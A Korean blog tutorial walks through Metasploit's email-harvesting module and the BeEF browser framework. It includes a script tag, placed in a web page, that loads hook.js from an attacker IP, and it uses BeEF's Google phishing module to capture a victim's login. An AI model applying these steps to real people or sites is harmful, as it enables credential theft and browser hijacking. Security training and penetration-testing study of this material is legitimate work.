Metasploit

msf ์ด์šฉํ•˜๊ธฐ // beEF ์‚ฌ์šฉ๋ฒ•

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2015. 12. 6.
728x90
๋ฐ˜์‘ํ˜•

msfconsole ์„ ์ด์šฉํ•˜์—ฌ ๋งŽ์€ ์ •๋ณด๋ฅผ ์ฐพ์„ ์ˆ˜ ์žˆ๋‹ค.

์•ž์—์„œ ๋ณด์—ฌ์ค€ ์ •๋ณด๋“ค ๋ฟ์•„๋‹ˆ๋ผ ์ด๋ฉ”์ผ ์ฃผ์†Œ๊นŒ์ง€ ์•Œ์•„๋‚ผ์ˆ˜ ์žˆ๋‹ค. 

ํ•˜์ง€๋งŒ msf ์ž์ฒด๋Š” ๋ฏธ๊ตญ์— ์ค‘์ ์ด ๋˜์–ด ํ•œ๊ตญ ์ •๋ณด๋Š” ๋งŽ์ด ์—†๋‹ค๋Š” ์ ์ด๋‹ค...


(์•…์˜์ ์ธ ํ–‰์œ„์˜ ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.)


1. use auxiliary/gather/search_email_collector



2. set domain [๋„๋ฉ”์ธ]




3. run





BeEF

BeEF๋Š” Browser Exploit Framework ๋กœ์จ ์‚ฌ์šฉ์ž PC์˜ ์ •๋ณด ์ˆ˜์ง‘๋ถ€ํ„ฐ ๊ณต๊ฒฉ๊นŒ์ง€ ๊ฐ€๋Šฅํ•œ ๋„๊ตฌ์ด๋‹ค. 

์ฃผ๋กœ xss(ํฌ๋กœ์Šค ์‚ฌ์ดํŠธ์Šคํฌ๋ฆฝํŠธ)๊ณต๊ฒฉ ์ทจ์•ฝ์ ์„ ์ฐพ๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ์ด๋œ๋‹ค. 

๊ทธ๋Ÿผ xss๋ž€ ๋ฌด์—‡์ผ๊นŒ? 

์ด๋Š” ์›น์—์„œ ์‚ฌ์šฉํ•˜๋Š” ํด๋ผ์ด์–ธํŠธ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํ†ตํ•ด ํŠน์ •ํ•œ ํ–‰๋™์„ ์ผ์œผํ‚ค๋Š” ์ทจ์•ฝ์ ์„ ๋งํ•œ๋‹ค.


beEF ์„ค์น˜!!


apt-get install beef-xss


๋จผ์ € BeEF๋ฅผ ์‹คํ–‰์‹œํ‚ค๊ธฐ ์ „์— apache2๋ฅผ ์‹คํ–‰์‹œํ‚ค์ž 


1. service apache2 start



์ „ ์ด๋ฏธ ์‹คํ–‰ ๋˜๊ณ  ์žˆ๋‹ค๊ณ  ๋œจ๋„ค์š”!!


๋‹ค์Œ์€ BeEF-xss๋ฅผ ์‹คํ–‰์‹œ์ผœ๋ณด์ž!!


2. beef-xss



์ž…๋ ฅํ•˜๊ณ  ๋ช‡์ดˆ ๊ธฐ๋‹ค๋ฆฌ๋ฉด 




์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋œฌ๋‹ค. (ID: beef // PW: beef)




์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋œจ๋Š”๋ฐ ์ €๊ฐ™์€ ๊ฒฝ์šฐ์—๋Š” ์ž ์‹œ ๋ญ˜ํ•œ๋‹ค๊ณ  ์‚ฌ์šฉํ•œํ”์ ์ด ์žˆ๋„ค์š”. ์™ผ์ชฝ์— ๋ณด๋ฉด IP๋“ค์ด ๋“ฑ๋ก๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.


์ด์ œ ํ•œ๊ฐ€์ง€ ํ•˜์…”์•ผํ•  ๊ฒƒ์ด์žˆ์Šต๋‹ˆ๋‹ค.!!!


3. cd /var/www <=์ด๋™ํ›„ index.html ๋‚ด์šฉ์„


4. vi index.html

<script src="http://๊ณต๊ฒฉ์ž IP :3000/hook.js"></script>



์ž…๋ ฅ์„ ํ•ด์ฃผ์‹œ๊ณ  esc : wq ์ฐจ๋ก€๋กœ ๋ˆŒ๋Ÿฌ์ฃผ์‹œ๋ฉด์„œ ๋‚˜์˜ต๋‹ˆ๋‹ค.


๊ทธ ํ›„ ํ”ผํ•ด์ž ์ปดํ“จํ„ฐ์—์„œ ๊ณต๊ฒฉ์ž ์•„์ดํ”ผ๋กœ์ ‘์†ํ•˜์‹œ๋ฉด 


์™ผ์ชฝ์— ์ด๋Ÿฌํ•˜๊ฒŒ ํ‘œ์‹œ๋ฉ๋‹ˆ๋‹ค. 

21 : Attacker IP

41 : Victim IP


์ด์ œ 41๋ฒˆ IP๋ฅผ ๋ˆŒ๋Ÿฌ๋ณด๋ฉด 




์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋‚˜์˜ต๋‹ˆ๋‹ค.


์œ„์˜ ๋ฉ”๋‰ด๋ฐ” ๊ฐ™์€ ๊ณณ์—์„œ commands๋ผ๋Š” ๋ฒ„ํŠผ์ด ์žˆ์Šต๋‹ˆ๋‹ค.

์—ฌ๊ธฐ์„œ ๋ช…๋ น์„ ๋‚ด๋ฆด์ˆ˜ ์žˆ๋Š”๋ฐ์š”?




๊ฐ์ข… ๋ชจ๋“ˆ์ด ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์„œ ๊ณจ๋ผ ์‚ฌ์šฉํ•˜์‹œ๋ฉด ๋ฉ๋‹ˆ๋‹ค.


๊ฐ„๋‹จํ•œ ๊ฒƒ์„ ํ•˜๋‚˜ ํ•ด๋ณผ๊นŒ์š”?




๊ตฌ๊ธ€ ํ”ผ์‹ฑ์‚ฌ์ดํŠธ๋ฅผ ๋งŒ๋“ค์–ด ๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค.


social engineering์—์„œ google phishing์„ ๋ˆ„๋ฅด์‹ ํ›„ execute๋ฅผ ํด๋ฆญํ•˜๋ฉด ์ ์šฉ์ด๋ฉ๋‹ˆ๋‹ค.





์ด๋ ‡๊ฒŒ ๋‚˜์˜ต๋‹ˆ๋‹ค. ์ €๋Š” ์ „์— ํ•œ์ ์ด ๋ช‡๋ฒˆ ์žˆ์–ด์„œ 8 ์ด๋ผ๊ณ  ์ฐํžˆ๋„ค์š”.




ํ”ผํ•ด์ž ์ปดํ“จํ„ฐ์—์„œ ๊ณต๊ฒฉ์ž IP๋ฅผ ์ž…๋ ฅํ•˜๋ฉด ์ด๋ ‡๊ฒŒ ๊ตฌ๊ธ€ ๋ฉ”์ผ์ฐฝ์ด๋œน๋‹ˆ๋‹ค.!!!

๊ณผ์—ฐ๋กœ๊ทธ์ธ์„ ํ•˜๋ฉด?




์ด๋ ‡๊ฒŒ ๊ณต๊ฒฉ์ž์—๊ฒŒ ๋‹ค๋„˜์–ด์˜จ๋‹ค๋Š” ์‚ฌ์‹ค!!!


๋‹ค์‹œํ•œ๋ฒˆ ๋งํ•˜์ง€๋งŒ ๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.!!


๋ชจ๋“ˆ์— metasploit๋ชจ๋“ˆ์ด 0์ด๋‹ค. ์ด๋ฅผ ๊ฒ€์ƒ‰ํ•ด๋ณด๋‹ˆ

http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true <= ๋ธ”๋กœ๊ทธ๊ฐ€ ๋‚˜์™”๋‹ค.! ํ•œ๋ฒˆ์ฝ์–ด๋ณด์žฅ!

728x90
๋ฐ˜์‘ํ˜•

'Metasploit' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

postgreSQL?  (0) 2015.12.14
msfvenom  (0) 2015.12.06
Arp Spoofing & DNS Spoofing  (0) 2015.12.06
msf ์ด์šฉํ•˜๊ธฐ2  (0) 2015.12.02
msfconsole ์ด์šฉํ•˜๊ธฐ  (0) 2015.12.01

๋Œ“๊ธ€